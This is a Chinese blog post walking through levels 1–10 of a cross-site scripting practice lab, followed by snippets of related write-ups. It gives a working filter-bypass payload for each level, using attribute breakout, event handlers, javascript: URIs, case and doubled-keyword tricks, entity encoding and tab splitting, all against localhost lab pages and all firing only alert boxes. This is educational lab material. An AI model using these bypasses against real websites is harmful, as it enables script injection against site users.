xss挑战1-10关

最新推荐文章于 2024-12-18 22:41:54 发布
最新推荐文章于 2024-12-18 22:41:54 发布
阅读量511 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Marsper/article/details/109170342
本文详细介绍了从level1到level10的XSS挑战,包括各种过滤和防御机制的绕过方法,如利用事件属性、HTML实体编码、大小写绕过等,逐步提升XSS攻击技能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

level1

没有任何过滤,直接URL后面加XSS测试语句

<script>alert('123')</script>;

弹窗

<script>alert('123')</script>;

在这里插入图片描述

level2

有搜索框,像第一关一样在搜索框测试一下,但是没有像第一关一样弹窗
在这里插入图片描述

查看源码发现我们的XSS语句被赋值给value并且在input标签里,所以我们需要闭合value和input标签就可以正常弹窗了

1"><script>alert('1');</script>

在这里插入图片描述

level3
转义了尖括号,这里可以用单引号闭合value但是没办法闭合input标签,但是可以注释掉标签然后用事件弹窗

1’ οnclick=alert(1)//

level4
跟第三关差不多,过滤了尖括号,用双引号闭合value然后注释掉标签用事件弹窗

1" οnclick=alert(1)//

level5
过滤了script和onclick标签,但是没过滤a标签

“><a href=” javascript:alert(1)"

level6
过滤了script,onclick,href,但是由于是用str_replace函数来过滤的,所以可以用大小写绕过

“><a HREF=” javascript:alert(1)"

level7
尝试了一下前面的payload,发现on,script,href关键字被屏蔽,但由于是直接替换为空,所以可以用单词嵌套来绕过

1" oonnclick=alert(1)//

level8
添加友情链接所以直接就有一个href标签,首先尝试了javascript:laert(1),

但是发现script被过滤了,然后尝试大小写绕过不行

最后用html实体编码绕过
javascript:alert(1)

level9
script被过滤,添加的url有验证合法性,没有带http://内则不合法,可以放在注释后面,通过tab制表符(%09)绕过对script的过滤
http://localhost/xss_test/level9.php?keyword=javascr%09ipt:alert(1)//http://

level10
有隐藏的form,尝试看能否注入

http://localhost/xss_test/level10.php?keyword=well done!&t_ilnk=" tyoe=“text” 1&t_history=" type=“text” 2&t_sort=" type=“text” 3
发现t_sort是可以注入的,于是用t_sort来弹窗

http://localhost/xss_test/level10.php?keyword=well done!&t_sort=" type=“text” οnclick="alert(1)

曦枳icon.
关注
xss漏洞靶场一到十
weixin_52029251的博客
03-09 820
第一: 先找注入点,但是页面没有注入的地方,之后查看元素,发现网址后的name可以修改,找到注入点后,将注入代码<script>alert(/xss/)</script>输入,即可完成。 第二 页面有一个搜索框可以进行代码注入,查看元素框,发现搜索后发现<input name="keyword" value=>后可以进行代码注入,之后将前面的代码进行闭合 之后输入注入代码<script>alert(/xxs/)</script&..
xss挑战1-10
weixin_45498459的博客
03-09 917
xss level1 代码 xsslevel1代码2第1中方法反射性第二种script标签level 3level4lelvel5scripta标签level6a链接">xss</alevle7lelve8level9level10 <!DOCTYPE html> <!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html...
XSS-challenge-tour(1-10)
qq_50650027的博客
10-17 663
在开始XSS-challenge-tour前我们先学习一下XSSXSS是一种利用网页在开发时留下的漏洞,输入javascript等代码完成所想完成的事情,在 XSS中要注意两点 1、输入 2、输出 ,输入就是在传参之类的传输到HTML代码中,最重要的是第二点输出,这里的输出并不是指在页面中输出是指输入的代码在HTML中输出的位置,在HTML代码中输出的位置闭合标签输出javascript等代码完成自己想要做的事情,在XSS-challenge-tour中只要触发了alert事件就算通 level 1
xss-challenge-tour(XSS靶场)1-10
00勇士王子的博客
09-06 1397
第一 第一是最简单的,什么限制都没有,直接上最普通的xss代码实现弹窗 <script>alert(xss)</script> payload <script>alert('xss')</script> 第二 直接输入第一的代码,没有弹窗,F12看一下代码,尝试进行闭合 下面是包含我们之前输入的内容的代码 <input name="keyword" value="<script>alert(/xss/)</scr.
XSS挑战(xsslabs)1~10解析
黄乔国PHP
03-06 1380
XSS挑战赛,里面包含了各种XSS的防御方式和绕过方式,好好掌握里面的绕过细节,有助于我们更好的去发现XSS漏洞以及XSS的防御。本文更多的是分享解析的细节,不是一个标准的答案,希望大家在渗透的时候有更多的思维。
XSS挑战1-10
kuller_Yan的博客
10-18 376
首先本次做题使用的XSS测试过滤payload为: <img src="avc"><a href="www"><script 'on> 第一题:直接payload <script>alert(1)</script> 第二题:查看源代码发现加了引号,直接绕过。 "><script>alert(1)</script><" 第三题: 源代码: <input name=keyword value='&amp
xss-labs-master源码
07-06
通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全防护能力。 首先,我们来看看"level8.jpg",这可能是一个隐藏的或者用于教学目的的图片,里面可能包含了某种编码或隐藏的XSS payload...
xss-labs-master靶机1-20解题思路
qq_41734243的博客
05-09 7551
xss-labs-master第一第二第三第四第五第六第七第八第九第十 xss-labs-master有二十 在这篇文章中,默认读者已有WEB渗透测试相知识,以及PHP、HTML等相知识。 第一 a、后台代码 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta ht...
OWASP之XSS漏洞(二)(xss-labs靶场1-5
最新发布
dirich的博客
12-18 433
首先可以使用js弹框代码进行检测,如果不行,看页面有什么提示,然后使用开发者工具查看前端代码,需要闭合先构造闭合,闭合可以使用双引号也可以使用单引号;前面说过(上一篇文章)在检测xss时候需要先找到输入点和输出点,这里我们可以看到页面中没有任何输入框,别忘了前面说过,get传参的url栏也可以传参,我们来试一下。(输入点可能是输入框,也可能是get传参的url)(这里的双引号是我后面为了讲解布上去的,后来才发现是中文字符的双引号,切记这里必须是。(搭建教程网上有很多,很简单,这里就不过多赘述了。
XSS-Labs靶场“6-10教程
钟言的博客
03-06 7973
本篇为XSS-Labs靶场的第6-10教程,详细内容包含了第六 大小写绕过、第七 双写绕过三、第八 URL编码绕过四、第九 http://判断五、第十 隐藏参数绕过等内容
xss challenges闯 1-10
夜思红尘的博客
04-12 670
xss challenges闯 1-10
xss平台游戏挑战 level1-10
freerats的博客
06-16 685
level-1 发现有个参数name, level1.php?name= 发现给参数传什么,页面就会显示欢迎什么 审查test处源码 发现被<h2>标签包裹 那么闭合标签,再加上弹窗语句即可 payload:name=</h2><script>alert(/xss/)</script> level-2 发现搜索框,跟上题类似,在输入框内输入,就会在上面显示与什么相的结果。 同样的,进行元素审查 尝试和第一题一样的做法,闭合标签<h2>发现无效
XSS靶场(1-11
weixin_65785894的博客
08-17 1425
我把源代码靶场放到了最顶端。
XSS挑战
crystal_shrimps的博客
09-02 1042
写在前面 很早就知道这个平台,但以前是只点了收藏,并没有好好做过。这个周末突然想学习,就翻出来做了做,也是不容易…只要弹窗就算过,wp网上都有,这里记录下我用的payload 传送门:xss挑战 预备知识 实体编码 entity code HTML中<>"等字符是预留的,要想再HTML中输出这些字符就需要实体编码,比如空格「&nbsp;」,小于号「&lt;」,大于...
xss-challenge(挑战之旅1~13)
weixin_55404107的博客
10-21 429
好。
XSS挑战之旅(10-18)
老司机开代码的博客
08-31 736
文章目录第十第十一第十二第十三第十四第十五第十六第十七第十八 第十 构造url提交 level10.php?keyword=<script>alert(1)</script> 首先ctrl+U看一下页面源码: <h1 align=center>欢迎来到level10</h1> <h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相
xss记录 1-10超详细
weixin_44717303的博客
03-31 827
xss挑战教程 挑战卡准备环境第一第二第三第四第五第六第七第八第九第十 准备环境 首先需要一个 xss挑战源码 需要准备一个PHPstuday 最后需要一台可以正常联网的电脑 第一 没有任何保护随便一条脚本语句均可 <a href=javascript:/00/,alert(%22M%22)>M</a> 第二 "> <a href=javascript:/00/,alert(%22M%22)>M</a>// 对比
XSS-labs(1-10)闯详解
m0_46467017的博客
07-25 3127
通过查看可以知道本与上一的不同,在于转换后的内容不同,虽然添加了大小写转换,但是因为转换后,字符被转换为空字符,所以转换后的字符如何仍可以组合成,那么就可以绕过该防御机制。进入第八后,发现无法构造闭合,采用是采用了htmlspecialchars($str)函数,而且闭合方式是双引号,所以input中无法注入,但是在连接里面是有地方可以注入的。右键查看源代码,发现我们输入的>,.........
xss挑战1-16
m0_73033023的博客
04-09 393
经实验,它会把script,on,href直接过滤掉,这里因为它过滤掉了,我们就可以考虑它会过滤一次还是几次或是直到没有为止,这里就可以用双写href来绕过,(记住,双写或多写的触发条件是对面过滤了敏感字符,而不是动不动用双写绕过,你的绕过思路要取决于对面的防御措施,而不是什么都不管,就全部用上!因为没有输入口,只能从URL入手,参数keyword对输入的"><做了过滤,显然不能利用了。尝试发现他对是否有http://进行判断,如果不存在http://则判断非法,所有在后面加一个http即可。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值